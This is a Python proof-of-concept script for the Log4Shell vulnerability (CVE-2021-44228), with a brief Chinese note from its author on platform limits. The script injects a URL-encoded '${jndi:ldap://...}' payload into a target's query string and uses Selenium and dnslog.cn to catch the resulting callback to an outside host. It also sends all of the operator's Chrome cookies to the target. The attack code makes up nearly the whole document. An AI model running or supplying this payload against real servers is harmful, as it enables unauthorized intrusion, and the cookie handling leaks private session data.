Poc_CVE-2021-44228

import requests
from selenium.webdriver import Chrome
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.by import By
import time
import urllib.parse
import browser_cookie3


def jndi(dns):
    dns = str(dns)
    pay1 = '${jndi:ldap://'
    pay2 = '/exp}'
    pay_url1 = urllib.parse.quote(pay1)
    pay_url2 = urllib.parse.quote(pay2)
    pay_url = pay_url1 + dns +pay_url2
    payload = 'payload='+str(pay_url)
    return (payload)

def verify(dns):
    time.sleep(5)
    driver.find_element(By.XPATH, '//*[@id="content"]/button[2]').click()
    time.sleep(5)
    ver = driver.find_element(By.XPATH, '//*[@id="myRecords"]/tbody/tr[2]/td[1]')
    re = dns
    flag = re in str(ver.text)

    if flag:
        print("It looks likely vulnerable")
    else:
        print("It is strong")

def exploit(url,dns):
    cookie = browser_cookie3.chrome()
    payload = url+'/hello?'+jndi(dns)
    response = requests.get(url=payload,cookies=cookie)
    print(response.text)
    verify(dns)

if __name__ == '__main__':
    url = 'http://' + input('Please input your ip:port(such as--127.0.0.1:80):')
    driver = Chrome()
    driver.get("http://www.dnslog.cn/")
    WebDriverWait(driver, 10).until(lambda d: "DNSLog" in d.title)
    driver.find_element(By.XPATH, '//*[@id="content"]/button[1]').click()
    time.sleep(5)
    dns = driver.find_element(By.XPATH, '//*[@id="myDomain"]')

    exploit(url,dns.text)

鄙人才疏学浅（再加上没有申请个人域名，毕竟太贵~），该poc仅限用于安装了chrome的windows系统，并不支持linux等。。如果有可用域名的话，将verify里的内容改为域名的访问，然后修改一下main函数，即可同样用于linux~